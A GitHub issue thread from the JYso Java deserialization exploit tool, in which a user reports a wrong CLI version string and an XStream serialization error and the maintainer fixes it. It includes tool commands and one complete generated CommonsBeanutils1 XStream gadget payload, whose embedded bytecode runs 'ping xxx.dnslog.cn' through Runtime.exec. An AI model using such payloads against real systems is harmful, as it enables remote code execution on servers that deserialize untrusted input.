search

qi4L / JYso

It can be either a JNDIExploit or a ysoserial.
GNU General Public License v3.0
1.49k stars 175 forks source link

cli版本号不正确+执行xstream链子错误 #58

Closed Mr-xn closed 1 day ago

Mr-xn commented 2 days ago 
#java -version                                               
java version "1.8.0_411"
#java -jar JYso-1.3.4.jar -y -g ImageIO -p /usr/bin/gedit -xs
 ┏┳┓┏    
  ┃┗┫┏┏┓ 
 ┗┛┗┛┛┗┛ version: 1.33
Error while generating or serializing payload
com.thoughtworks.xstream.InitializationException: Could not instantiate mapper : com.thoughtworks.xstream.mapper.EnumMapper
    at com.thoughtworks.xstream.XStream.buildMapperDynamically(XStream.java:627)
    at com.thoughtworks.xstream.XStream.buildMapper(XStream.java:596)
    at com.thoughtworks.xstream.XStream.<init>(XStream.java:568)
    at com.thoughtworks.xstream.XStream.<init>(XStream.java:496)
    at com.thoughtworks.xstream.XStream.<init>(XStream.java:465)
    at com.thoughtworks.xstream.XStream.<init>(XStream.java:411)
    at com.thoughtworks.xstream.XStream.<init>(XStream.java:350)
    at com.qi4l.JYso.gadgets.utils.Serializer.qiserialize(Serializer.java:89)
    at com.qi4l.JYso.controllers.ysoserial.ysoserial(ysoserial.java:193)
    at com.qi4l.JYso.Starter.main(Starter.java:37)
Caused by: java.lang.ClassNotFoundException: com.thoughtworks.xstream.mapper.EnumMapper
    at com.thoughtworks.xstream.core.util.CompositeClassLoader.loadClass(CompositeClassLoader.java:148)
    at java.lang.Class.forName0(Native Method)
    at java.lang.Class.forName(Class.java:348)
    at com.thoughtworks.xstream.XStream.buildMapperDynamically(XStream.java:623)
    ... 9 more
qi4L commented 1 day ago

修复了,重新下载1.3.4的jar即可 image

Mr-xn commented 1 day ago

😅 还是同样的错误.... 难道是我环境问题么.

#java -jar JYso-1.3.3.jar -y -x CommonsBeanutils1 -p 'ping xxx.dnslog.cn'
 ┏┳┓┏    
  ┃┗┫┏┏┓ 
 ┗┛┗┛┛┗┛ version: 1.33
<java.util.PriorityQueue serialization="custom">
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
      <comparator class="org.apache.commons.beanutils.BeanComparator">
        <property>outputProperties</property>
        <comparator class="java.lang.String$CaseInsensitiveComparator"/>
      </comparator>
    </default>
    <int>3</int>
    <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl serialization="custom">
      <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
        <default>
          <__name>a</__name>
          <__bytecodes>
            <byte-array>yv66vgAAADEAFgEAKG9yZy9hcGFjaGUvY29tbW9ucy9pbXBsL3hzL1hTRWxlbWVudERlY2wHAAEBABBqYXZhL2xhbmcvT2JqZWN0BwADAQAGPGluaXQ+AQADKClWAQAEQ29kZQwABQAGCgAEAAgBABFqYXZhL2xhbmcvUnVudGltZQcACgEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsMAAwADQoACwAOAQAScGluZyB4eHguZG5zbG9nLmNuCAAQAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAEgATCgALABQAIQACAAQAAAAAAAEAAQAFAAYAAQAHAAAAGgACAAEAAAAOKrcACbgADxIRtgAVV7EAAAAAAAA=</byte-array>
            <byte-array>yv66vgAAADQAEQEANG9yZy9hcGFjaGUvbWF2ZW4vYXJjaGl2ZS9waGFzZS9Bc3NlbWJseUFyY2hpdmVyUGhhc2UHAAEBABBqYXZhL2xhbmcvT2JqZWN0BwADAQAKU291cmNlRmlsZQEAGkFzc2VtYmx5QXJjaGl2ZXJQaGFzZS5qYXZhAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoFceZp7jxtRxgBAA1Db25zdGFudFZhbHVlAQAGPGluaXQ+AQADKClWDAAMAA0KAAQADgEABENvZGUAIQACAAQAAAABABoABwAIAAEACwAAAAIACQABAAEADAANAAEAEAAAABEAAQABAAAABSq3AA+xAAAAAAABAAUAAAACAAY=</byte-array>
          </__bytecodes>
          <__transletIndex>0</__transletIndex>
          <__indentNumber>0</__indentNumber>
        </default>
        <boolean>false</boolean>
      </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
    </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
    <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl reference="../com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"/>
  </java.util.PriorityQueue>
</java.util.PriorityQueue>

#java -jar JYso-1.3.4.jar -y -g CommonsBeanutils1 -p 'ping xxx.dnslog.cn' -xs
 ┏┳┓┏    
  ┃┗┫┏┏┓ 
 ┗┛┗┛┛┗┛ version: 1.34
Error while generating or serializing payload
com.thoughtworks.xstream.InitializationException: Could not instantiate mapper : com.thoughtworks.xstream.mapper.EnumMapper
    at com.thoughtworks.xstream.XStream.buildMapperDynamically(XStream.java:627)
    at com.thoughtworks.xstream.XStream.buildMapper(XStream.java:596)
    at com.thoughtworks.xstream.XStream.<init>(XStream.java:568)
    at com.thoughtworks.xstream.XStream.<init>(XStream.java:496)
    at com.thoughtworks.xstream.XStream.<init>(XStream.java:465)
    at com.thoughtworks.xstream.XStream.<init>(XStream.java:411)
    at com.thoughtworks.xstream.XStream.<init>(XStream.java:350)
    at com.qi4l.JYso.gadgets.utils.Serializer.qiserialize(Serializer.java:89)
    at com.qi4l.JYso.controllers.ysoserial.ysoserial(ysoserial.java:193)
    at com.qi4l.JYso.Starter.main(Starter.java:37)
Caused by: java.lang.ClassNotFoundException: com.thoughtworks.xstream.mapper.EnumMapper
    at com.thoughtworks.xstream.core.util.CompositeClassLoader.loadClass(CompositeClassLoader.java:148)
    at java.lang.Class.forName0(Native Method)
    at java.lang.Class.forName(Class.java:348)
    at com.thoughtworks.xstream.XStream.buildMapperDynamically(XStream.java:623)
    ... 9 more
qi4L commented 1 day ago

image

qi4L commented 1 day ago

在去下次一次看看

Mr-xn commented 1 day ago

在去下次一次看看

好了 感谢